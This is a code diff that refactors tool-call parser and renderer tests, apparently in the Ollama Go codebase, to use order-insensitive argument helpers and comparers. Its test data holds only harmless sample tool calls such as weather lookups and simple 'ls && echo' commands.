@ -378,7 +378,7 @@ func TestParseOlmo3FunctionCalls(t *testing.T) {
|
|||
{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "get_weather",
|
||||
Arguments: map[string]any{"location": "SF"},
|
||||
Arguments: testArgs(map[string]any{"location": "SF"}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -390,11 +390,11 @@ func TestParseOlmo3FunctionCalls(t *testing.T) {
|
|||
{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "send_email",
|
||||
Arguments: map[string]any{
|
||||
Arguments: testArgs(map[string]any{
|
||||
"to": "user@example.com",
|
||||
"subject": "Hello",
|
||||
"body": "Test message",
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -407,13 +407,13 @@ get_time(timezone="PST")`,
|
|||
{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "get_weather",
|
||||
Arguments: map[string]any{"location": "SF"},
|
||||
Arguments: testArgs(map[string]any{"location": "SF"}),
|
||||
},
|
||||
},
|
||||
{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "get_time",
|
||||
Arguments: map[string]any{"timezone": "PST"},
|
||||
Arguments: testArgs(map[string]any{"timezone": "PST"}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -437,7 +437,7 @@ get_time(timezone="PST")`,
|
|||
t.Errorf("parseOlmo3FunctionCalls() error = %v, wantErr %v", err, tt.wantErr)
|
||||
return
|
||||
}
|
||||
if diff := cmp.Diff(calls, tt.expected); diff != "" {
|
||||
if diff := cmp.Diff(calls, tt.expected, argsComparer); diff != "" {
|
||||
t.Errorf("calls mismatch (-got +want):\n%s", diff)
|
||||
}
|
||||
})
|
||||
|
|
|
|||
|
|
@ -270,12 +270,12 @@ func parseToolCall(raw qwenEventRawToolCall, tools []api.Tool) (api.ToolCall, er
|
|||
}
|
||||
}
|
||||
|
||||
toolCall.Function.Arguments = make(api.ToolCallFunctionArguments)
|
||||
toolCall.Function.Arguments = api.NewToolCallFunctionArguments()
|
||||
for _, parameter := range functionCall.Parameters {
|
||||
// Look up the parameter type if we found the tool
|
||||
var paramType api.PropertyType
|
||||
if matchedTool != nil && matchedTool.Function.Parameters.Properties != nil {
|
||||
if prop, ok := matchedTool.Function.Parameters.Properties[parameter.Name]; ok {
|
||||
if prop, ok := matchedTool.Function.Parameters.Properties.Get(parameter.Name); ok {
|
||||
// Handle anyOf by collecting all types from the union
|
||||
if len(prop.AnyOf) > 0 {
|
||||
for _, anyOfProp := range prop.AnyOf {
|
||||
|
|
@ -287,7 +287,7 @@ func parseToolCall(raw qwenEventRawToolCall, tools []api.Tool) (api.ToolCall, er
|
|||
}
|
||||
}
|
||||
|
||||
toolCall.Function.Arguments[parameter.Name] = parseValue(parameter.Value, paramType)
|
||||
toolCall.Function.Arguments.Set(parameter.Name, parseValue(parameter.Value, paramType))
|
||||
}
|
||||
|
||||
return toolCall, nil
|
||||
|
|
|
|||
|
|
@ -11,7 +11,7 @@ import (
|
|||
func tool(name string, props map[string]api.ToolProperty) api.Tool {
|
||||
t := api.Tool{Type: "function", Function: api.ToolFunction{Name: name}}
|
||||
t.Function.Parameters.Type = "object"
|
||||
t.Function.Parameters.Properties = props
|
||||
t.Function.Parameters.Properties = testPropsMap(props)
|
||||
return t
|
||||
}
|
||||
|
||||
|
|
@ -369,10 +369,10 @@ celsius
|
|||
wantToolCall: api.ToolCall{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "get_current_temperature",
|
||||
Arguments: map[string]any{
|
||||
Arguments: testArgs(map[string]any{
|
||||
"location": "San Francisco",
|
||||
"unit": "celsius",
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -390,10 +390,10 @@ celsius
|
|||
wantToolCall: api.ToolCall{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "get current temperature",
|
||||
Arguments: map[string]any{
|
||||
Arguments: testArgs(map[string]any{
|
||||
"location with spaces": "San Francisco",
|
||||
"unit with spaces": "celsius",
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -415,10 +415,10 @@ San Francisco
|
|||
wantToolCall: api.ToolCall{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "\"get current temperature\"",
|
||||
Arguments: map[string]any{
|
||||
Arguments: testArgs(map[string]any{
|
||||
"\"location with spaces\"": "San Francisco",
|
||||
"\"unit with spaces\"": "\"celsius\"",
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -449,12 +449,12 @@ true
|
|||
wantToolCall: api.ToolCall{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "calculate",
|
||||
Arguments: map[string]any{
|
||||
Arguments: testArgs(map[string]any{
|
||||
"x": 3.14,
|
||||
"y": 42,
|
||||
"enabled": true,
|
||||
"items": []any{"a", "b", "c"},
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -470,9 +470,9 @@ ls && echo "done"
|
|||
wantToolCall: api.ToolCall{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "exec",
|
||||
Arguments: map[string]any{
|
||||
Arguments: testArgs(map[string]any{
|
||||
"command": "ls && echo \"done\"",
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -487,9 +487,9 @@ ls && echo "a > b and a < b"
|
|||
wantToolCall: api.ToolCall{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "exec",
|
||||
Arguments: map[string]any{
|
||||
Arguments: testArgs(map[string]any{
|
||||
"command": "ls && echo \"a > b and a < b\"",
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -507,10 +507,10 @@ Hello! 你好! 🌟 مرحبا
|
|||
wantToolCall: api.ToolCall{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "获取天气",
|
||||
Arguments: map[string]any{
|
||||
Arguments: testArgs(map[string]any{
|
||||
"城市": "北京",
|
||||
"message": "Hello! 你好! 🌟 مرحبا",
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -521,7 +521,7 @@ Hello! 你好! 🌟 مرحبا
|
|||
if err != nil {
|
||||
t.Errorf("step %d (%s): %v", i, step.name, err)
|
||||
}
|
||||
if !reflect.DeepEqual(gotToolCall, step.wantToolCall) {
|
||||
if !toolCallEqual(gotToolCall, step.wantToolCall) {
|
||||
t.Errorf("step %d (%s): got tool call %#v, want %#v", i, step.name, gotToolCall, step.wantToolCall)
|
||||
}
|
||||
}
|
||||
|
|
|
|||
|
|
@ -550,10 +550,10 @@ func TestQwen3VLNonThinkingToolParser(t *testing.T) {
|
|||
wantToolCall: api.ToolCall{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "get-current-weather",
|
||||
Arguments: map[string]any{
|
||||
Arguments: testArgs(map[string]any{
|
||||
"location": "San Francisco, CA",
|
||||
"unit": "fahrenheit",
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -564,10 +564,10 @@ func TestQwen3VLNonThinkingToolParser(t *testing.T) {
|
|||
wantToolCall: api.ToolCall{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "get current temperature",
|
||||
Arguments: map[string]any{
|
||||
Arguments: testArgs(map[string]any{
|
||||
"location with spaces": "San Francisco",
|
||||
"unit with spaces": "celsius",
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -578,10 +578,10 @@ func TestQwen3VLNonThinkingToolParser(t *testing.T) {
|
|||
wantToolCall: api.ToolCall{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "\"get current temperature\"",
|
||||
Arguments: map[string]any{
|
||||
Arguments: testArgs(map[string]any{
|
||||
"\"location with spaces\"": "San Francisco",
|
||||
"\"unit with spaces\"": "\"celsius\"",
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -592,12 +592,12 @@ func TestQwen3VLNonThinkingToolParser(t *testing.T) {
|
|||
wantToolCall: api.ToolCall{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "calculate",
|
||||
Arguments: map[string]any{
|
||||
Arguments: testArgs(map[string]any{
|
||||
"x": 3.14,
|
||||
"y": float64(42),
|
||||
"enabled": true,
|
||||
"items": []any{"a", "b", "c"},
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -608,9 +608,9 @@ func TestQwen3VLNonThinkingToolParser(t *testing.T) {
|
|||
wantToolCall: api.ToolCall{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "exec",
|
||||
Arguments: map[string]any{
|
||||
Arguments: testArgs(map[string]any{
|
||||
"command": "ls && echo \"done\"",
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -621,9 +621,9 @@ func TestQwen3VLNonThinkingToolParser(t *testing.T) {
|
|||
wantToolCall: api.ToolCall{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "exec",
|
||||
Arguments: map[string]any{
|
||||
Arguments: testArgs(map[string]any{
|
||||
"command": "ls && echo \"a > b and a < b\"",
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -634,10 +634,10 @@ func TestQwen3VLNonThinkingToolParser(t *testing.T) {
|
|||
wantToolCall: api.ToolCall{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "获取天气",
|
||||
Arguments: map[string]any{
|
||||
Arguments: testArgs(map[string]any{
|
||||
"城市": "北京",
|
||||
"message": "Hello! 你好! 🌟 مرحبا",
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -648,7 +648,7 @@ func TestQwen3VLNonThinkingToolParser(t *testing.T) {
|
|||
if err != nil {
|
||||
t.Errorf("step %d (%s): %v", i, step.name, err)
|
||||
}
|
||||
if !reflect.DeepEqual(gotToolCall, step.wantToolCall) {
|
||||
if !toolCallEqual(gotToolCall, step.wantToolCall) {
|
||||
t.Errorf("step %d (%s): got tool call %#v, want %#v", i, step.name, gotToolCall, step.wantToolCall)
|
||||
}
|
||||
}
|
||||
|
|
|
|||
|
|
@ -241,10 +241,10 @@ func TestQwen3VLThinkingToolParser(t *testing.T) {
|
|||
wantToolCall: api.ToolCall{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "get-current-weather",
|
||||
Arguments: map[string]any{
|
||||
Arguments: testArgs(map[string]any{
|
||||
"location": "San Francisco, CA",
|
||||
"unit": "fahrenheit",
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -255,10 +255,10 @@ func TestQwen3VLThinkingToolParser(t *testing.T) {
|
|||
wantToolCall: api.ToolCall{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "get current temperature",
|
||||
Arguments: map[string]any{
|
||||
Arguments: testArgs(map[string]any{
|
||||
"location with spaces": "San Francisco",
|
||||
"unit with spaces": "celsius",
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -269,10 +269,10 @@ func TestQwen3VLThinkingToolParser(t *testing.T) {
|
|||
wantToolCall: api.ToolCall{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "\"get current temperature\"",
|
||||
Arguments: map[string]any{
|
||||
Arguments: testArgs(map[string]any{
|
||||
"\"location with spaces\"": "San Francisco",
|
||||
"\"unit with spaces\"": "\"celsius\"",
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -283,12 +283,12 @@ func TestQwen3VLThinkingToolParser(t *testing.T) {
|
|||
wantToolCall: api.ToolCall{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "calculate",
|
||||
Arguments: map[string]any{
|
||||
Arguments: testArgs(map[string]any{
|
||||
"x": 3.14,
|
||||
"y": float64(42),
|
||||
"enabled": true,
|
||||
"items": []any{"a", "b", "c"},
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -299,9 +299,9 @@ func TestQwen3VLThinkingToolParser(t *testing.T) {
|
|||
wantToolCall: api.ToolCall{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "exec",
|
||||
Arguments: map[string]any{
|
||||
Arguments: testArgs(map[string]any{
|
||||
"command": "ls && echo \"done\"",
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -312,9 +312,9 @@ func TestQwen3VLThinkingToolParser(t *testing.T) {
|
|||
wantToolCall: api.ToolCall{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "exec",
|
||||
Arguments: map[string]any{
|
||||
Arguments: testArgs(map[string]any{
|
||||
"command": "ls && echo \"a > b and a < b\"",
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -325,10 +325,10 @@ func TestQwen3VLThinkingToolParser(t *testing.T) {
|
|||
wantToolCall: api.ToolCall{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "获取天气",
|
||||
Arguments: map[string]any{
|
||||
Arguments: testArgs(map[string]any{
|
||||
"城市": "北京",
|
||||
"message": "Hello! 你好! 🌟 مرحبا",
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -339,7 +339,7 @@ func TestQwen3VLThinkingToolParser(t *testing.T) {
|
|||
if err != nil {
|
||||
t.Errorf("step %d (%s): %v", i, step.name, err)
|
||||
}
|
||||
if !reflect.DeepEqual(gotToolCall, step.wantToolCall) {
|
||||
if !toolCallEqual(gotToolCall, step.wantToolCall) {
|
||||
t.Errorf("step %d (%s): got tool call %#v, want %#v", i, step.name, gotToolCall, step.wantToolCall)
|
||||
}
|
||||
}
|
||||
|
|
|
|||
|
|
@ -0,0 +1,98 @@
|
|||
package parsers
|
||||
|
||||
import (
|
||||
"encoding/json"
|
||||
|
||||
"github.com/google/go-cmp/cmp"
|
||||
"github.com/ollama/ollama/api"
|
||||
)
|
||||
|
||||
// argsComparer provides cmp options for comparing ToolCallFunctionArguments
|
||||
// It compares by logical equality (same keys with same values) not by order
|
||||
var argsComparer = cmp.Comparer(func(a, b api.ToolCallFunctionArguments) bool {
|
||||
// Convert both to maps and compare
|
||||
aMap := a.ToMap()
|
||||
bMap := b.ToMap()
|
||||
if len(aMap) != len(bMap) {
|
||||
return false
|
||||
}
|
||||
for k, av := range aMap {
|
||||
bv, ok := bMap[k]
|
||||
if !ok {
|
||||
return false
|
||||
}
|
||||
// Use JSON encoding for deep comparison of values
|
||||
aJSON, _ := json.Marshal(av)
|
||||
bJSON, _ := json.Marshal(bv)
|
||||
if string(aJSON) != string(bJSON) {
|
||||
return false
|
||||
}
|
||||
}
|
||||
return true
|
||||
})
|
||||
|
||||
// propsComparer provides cmp options for comparing ToolPropertiesMap
|
||||
var propsComparer = cmp.Comparer(func(a, b *api.ToolPropertiesMap) bool {
|
||||
if a == nil && b == nil {
|
||||
return true
|
||||
}
|
||||
if a == nil || b == nil {
|
||||
return false
|
||||
}
|
||||
aJSON, _ := json.Marshal(a)
|
||||
bJSON, _ := json.Marshal(b)
|
||||
return string(aJSON) == string(bJSON)
|
||||
})
|
||||
|
||||
// toolsComparer combines argsComparer and propsComparer for comparing tools
|
||||
var toolsComparer = cmp.Options{argsComparer, propsComparer}
|
||||
|
||||
// toolCallEqual compares two tool calls by comparing their components
|
||||
// It compares arguments by logical equality (same keys with same values) not by order
|
||||
func toolCallEqual(a, b api.ToolCall) bool {
|
||||
if a.ID != b.ID {
|
||||
return false
|
||||
}
|
||||
if a.Function.Index != b.Function.Index {
|
||||
return false
|
||||
}
|
||||
if a.Function.Name != b.Function.Name {
|
||||
return false
|
||||
}
|
||||
// Compare arguments by logical equality using argsComparer logic
|
||||
aMap := a.Function.Arguments.ToMap()
|
||||
bMap := b.Function.Arguments.ToMap()
|
||||
if len(aMap) != len(bMap) {
|
||||
return false
|
||||
}
|
||||
for k, av := range aMap {
|
||||
bv, ok := bMap[k]
|
||||
if !ok {
|
||||
return false
|
||||
}
|
||||
aJSON, _ := json.Marshal(av)
|
||||
bJSON, _ := json.Marshal(bv)
|
||||
if string(aJSON) != string(bJSON) {
|
||||
return false
|
||||
}
|
||||
}
|
||||
return true
|
||||
}
|
||||
|
||||
// testPropsMap creates a ToolPropertiesMap from a map (convenience function for tests, order not preserved)
|
||||
func testPropsMap(m map[string]api.ToolProperty) *api.ToolPropertiesMap {
|
||||
props := api.NewToolPropertiesMap()
|
||||
for k, v := range m {
|
||||
props.Set(k, v)
|
||||
}
|
||||
return props
|
||||
}
|
||||
|
||||
// testArgs creates ToolCallFunctionArguments from a map (convenience function for tests, order not preserved)
|
||||
func testArgs(m map[string]any) api.ToolCallFunctionArguments {
|
||||
args := api.NewToolCallFunctionArguments()
|
||||
for k, v := range m {
|
||||
args.Set(k, v)
|
||||
}
|
||||
return args
|
||||
}
|
||||
|
|
@ -94,12 +94,12 @@ You are a helpful assistant.
|
|||
Description: "Get current weather",
|
||||
Parameters: api.ToolFunctionParameters{
|
||||
Type: "object",
|
||||
Properties: map[string]api.ToolProperty{
|
||||
Properties: testPropsMap(map[string]api.ToolProperty{
|
||||
"location": {
|
||||
Type: api.PropertyType{"string"},
|
||||
Description: "City name",
|
||||
},
|
||||
},
|
||||
}),
|
||||
Required: []string{"location"},
|
||||
},
|
||||
},
|
||||
|
|
@ -139,9 +139,9 @@ You have the following functions available:
|
|||
{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "get_weather",
|
||||
Arguments: api.ToolCallFunctionArguments{
|
||||
Arguments: testArgs(map[string]any{
|
||||
"location": "Paris",
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -162,9 +162,9 @@ You have the following functions available:
|
|||
{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "get_weather",
|
||||
Arguments: api.ToolCallFunctionArguments{
|
||||
Arguments: testArgs(map[string]any{
|
||||
"location": "Paris",
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -186,17 +186,17 @@ You have the following functions available:
|
|||
{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "get_weather",
|
||||
Arguments: api.ToolCallFunctionArguments{
|
||||
Arguments: testArgs(map[string]any{
|
||||
"location": "Paris",
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "get_weather",
|
||||
Arguments: api.ToolCallFunctionArguments{
|
||||
Arguments: testArgs(map[string]any{
|
||||
"location": "London",
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -226,12 +226,12 @@ You have the following functions available:
|
|||
Description: "Get current weather",
|
||||
Parameters: api.ToolFunctionParameters{
|
||||
Type: "object",
|
||||
Properties: map[string]api.ToolProperty{
|
||||
Properties: testPropsMap(map[string]api.ToolProperty{
|
||||
"location": {
|
||||
Type: api.PropertyType{"string"},
|
||||
Description: "City name",
|
||||
},
|
||||
},
|
||||
}),
|
||||
Required: []string{"location"},
|
||||
},
|
||||
},
|
||||
|
|
@ -378,9 +378,9 @@ You are a pirate chatbot who always responds in pirate speak!
|
|||
{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "get_weather",
|
||||
Arguments: api.ToolCallFunctionArguments{
|
||||
Arguments: testArgs(map[string]any{
|
||||
"location": "Paris",
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -401,14 +401,14 @@ You are a pirate chatbot who always responds in pirate speak!
|
|||
{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "process_data",
|
||||
Arguments: api.ToolCallFunctionArguments{
|
||||
"items": []any{"item1", "item2", "item3"},
|
||||
"config": map[string]any{
|
||||
Arguments: testArgsOrdered([]orderedArg{
|
||||
{"config", map[string]any{
|
||||
"enabled": true,
|
||||
"threshold": 0.95,
|
||||
"tags": []string{"important", "urgent"},
|
||||
},
|
||||
},
|
||||
}},
|
||||
{"items", []any{"item1", "item2", "item3"}},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
|
|||
|
|
@ -82,9 +82,9 @@ Second instruction<|User|>Hello<|Assistant|></think>`,
|
|||
{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "get_weather",
|
||||
Arguments: api.ToolCallFunctionArguments{
|
||||
Arguments: testArgs(map[string]any{
|
||||
"location": "Paris",
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -104,9 +104,9 @@ Second instruction<|User|>Hello<|Assistant|></think>`,
|
|||
{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "get_weather",
|
||||
Arguments: api.ToolCallFunctionArguments{
|
||||
Arguments: testArgs(map[string]any{
|
||||
"location": "Paris",
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -125,9 +125,9 @@ Second instruction<|User|>Hello<|Assistant|></think>`,
|
|||
{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "get_weather",
|
||||
Arguments: api.ToolCallFunctionArguments{
|
||||
Arguments: testArgs(map[string]any{
|
||||
"location": "Paris",
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -147,17 +147,17 @@ Second instruction<|User|>Hello<|Assistant|></think>`,
|
|||
{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "get_weather",
|
||||
Arguments: api.ToolCallFunctionArguments{
|
||||
Arguments: testArgs(map[string]any{
|
||||
"location": "Paris",
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "get_weather",
|
||||
Arguments: api.ToolCallFunctionArguments{
|
||||
Arguments: testArgs(map[string]any{
|
||||
"location": "London",
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -214,9 +214,9 @@ Second instruction<|User|>Hello<|Assistant|></think>`,
|
|||
{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "get_weather",
|
||||
Arguments: api.ToolCallFunctionArguments{
|
||||
Arguments: testArgs(map[string]any{
|
||||
"location": "Paris",
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -235,9 +235,9 @@ Second instruction<|User|>Hello<|Assistant|></think>`,
|
|||
{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "process",
|
||||
Arguments: api.ToolCallFunctionArguments{
|
||||
Arguments: testArgs(map[string]any{
|
||||
"data": "test",
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -281,9 +281,9 @@ Second instruction<|User|>Hello<|Assistant|></think>`,
|
|||
{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "get_weather",
|
||||
Arguments: api.ToolCallFunctionArguments{
|
||||
Arguments: testArgs(map[string]any{
|
||||
"location": "Paris",
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -305,9 +305,9 @@ Second instruction<|User|>Hello<|Assistant|></think>`,
|
|||
{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "get_weather",
|
||||
Arguments: api.ToolCallFunctionArguments{
|
||||
Arguments: testArgs(map[string]any{
|
||||
"location": "Paris",
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -355,9 +355,9 @@ Second instruction<|User|>Hello<|Assistant|></think>`,
|
|||
{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "get_weather",
|
||||
Arguments: api.ToolCallFunctionArguments{
|
||||
Arguments: testArgs(map[string]any{
|
||||
"location": "Paris",
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -379,9 +379,9 @@ Second instruction<|User|>Hello<|Assistant|></think>`,
|
|||
{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "get_weather",
|
||||
Arguments: api.ToolCallFunctionArguments{
|
||||
Arguments: testArgs(map[string]any{
|
||||
"location": "Paris",
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -436,17 +436,17 @@ Second instruction<|User|>Hello<|Assistant|></think>`,
|
|||
{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "get_weather",
|
||||
Arguments: api.ToolCallFunctionArguments{
|
||||
Arguments: testArgs(map[string]any{
|
||||
"location": "Tokyo",
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "get_weather",
|
||||
Arguments: api.ToolCallFunctionArguments{
|
||||
Arguments: testArgs(map[string]any{
|
||||
"location": "New York",
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -489,12 +489,12 @@ Second instruction<|User|>Hello<|Assistant|></think>`,
|
|||
Description: "Get current weather information",
|
||||
Parameters: api.ToolFunctionParameters{
|
||||
Type: "object",
|
||||
Properties: map[string]api.ToolProperty{
|
||||
Properties: testPropsMap(map[string]api.ToolProperty{
|
||||
"location": {
|
||||
Type: api.PropertyType{"string"},
|
||||
Description: "City name",
|
||||
},
|
||||
},
|
||||
}),
|
||||
Required: []string{"location"},
|
||||
},
|
||||
},
|
||||
|
|
@ -535,12 +535,12 @@ Where:
|
|||
Description: "Get current weather information",
|
||||
Parameters: api.ToolFunctionParameters{
|
||||
Type: "object",
|
||||
Properties: map[string]api.ToolProperty{
|
||||
Properties: testPropsMap(map[string]api.ToolProperty{
|
||||
"location": {
|
||||
Type: api.PropertyType{"string"},
|
||||
Description: "City name",
|
||||
},
|
||||
},
|
||||
}),
|
||||
Required: []string{"location"},
|
||||
},
|
||||
},
|
||||
|
|
@ -578,9 +578,9 @@ Where:
|
|||
{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "get_weather",
|
||||
Arguments: api.ToolCallFunctionArguments{
|
||||
Arguments: testArgs(map[string]any{
|
||||
"location": "Paris",
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -594,12 +594,12 @@ Where:
|
|||
Description: "Get current weather information",
|
||||
Parameters: api.ToolFunctionParameters{
|
||||
Type: "object",
|
||||
Properties: map[string]api.ToolProperty{
|
||||
Properties: testPropsMap(map[string]api.ToolProperty{
|
||||
"location": {
|
||||
Type: api.PropertyType{"string"},
|
||||
Description: "City name",
|
||||
},
|
||||
},
|
||||
}),
|
||||
Required: []string{"location"},
|
||||
},
|
||||
},
|
||||
|
|
@ -638,9 +638,9 @@ Where:
|
|||
{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "get_weather",
|
||||
Arguments: api.ToolCallFunctionArguments{
|
||||
Arguments: testArgs(map[string]any{
|
||||
"location": "Paris",
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -656,12 +656,12 @@ Where:
|
|||
Description: "Get current weather information",
|
||||
Parameters: api.ToolFunctionParameters{
|
||||
Type: "object",
|
||||
Properties: map[string]api.ToolProperty{
|
||||
Properties: testPropsMap(map[string]api.ToolProperty{
|
||||
"location": {
|
||||
Type: api.PropertyType{"string"},
|
||||
Description: "City name",
|
||||
},
|
||||
},
|
||||
}),
|
||||
Required: []string{"location"},
|
||||
},
|
||||
},
|
||||
|
|
@ -701,9 +701,9 @@ Where:
|
|||
{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "get_weather",
|
||||
Arguments: api.ToolCallFunctionArguments{
|
||||
Arguments: testArgs(map[string]any{
|
||||
"location": "Tokyo",
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -724,12 +724,12 @@ Where:
|
|||
Description: "Get current weather information",
|
||||
Parameters: api.ToolFunctionParameters{
|
||||
Type: "object",
|
||||
Properties: map[string]api.ToolProperty{
|
||||
Properties: testPropsMap(map[string]api.ToolProperty{
|
||||
"location": {
|
||||
Type: api.PropertyType{"string"},
|
||||
Description: "City name",
|
||||
},
|
||||
},
|
||||
}),
|
||||
Required: []string{"location"},
|
||||
},
|
||||
},
|
||||
|
|
@ -770,12 +770,12 @@ Where:
|
|||
Description: "Get current weather information",
|
||||
Parameters: api.ToolFunctionParameters{
|
||||
Type: "object",
|
||||
Properties: map[string]api.ToolProperty{
|
||||
Properties: testPropsMap(map[string]api.ToolProperty{
|
||||
"location": {
|
||||
Type: api.PropertyType{"string"},
|
||||
Description: "City name",
|
||||
},
|
||||
},
|
||||
}),
|
||||
Required: []string{"location"},
|
||||
},
|
||||
},
|
||||
|
|
@ -787,12 +787,12 @@ Where:
|
|||
Description: "Perform mathematical calculations",
|
||||
Parameters: api.ToolFunctionParameters{
|
||||
Type: "object",
|
||||
Properties: map[string]api.ToolProperty{
|
||||
Properties: testPropsMap(map[string]api.ToolProperty{
|
||||
"expression": {
|
||||
Type: api.PropertyType{"string"},
|
||||
Description: "Mathematical expression to evaluate",
|
||||
},
|
||||
},
|
||||
}),
|
||||
Required: []string{"expression"},
|
||||
},
|
||||
},
|
||||
|
|
@ -834,17 +834,17 @@ Where:
|
|||
{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "get_weather",
|
||||
Arguments: api.ToolCallFunctionArguments{
|
||||
Arguments: testArgs(map[string]any{
|
||||
"location": "Paris",
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "calculate",
|
||||
Arguments: api.ToolCallFunctionArguments{
|
||||
Arguments: testArgs(map[string]any{
|
||||
"expression": "25 * 4",
|
||||
},
|
||||
}),
|
||||
},
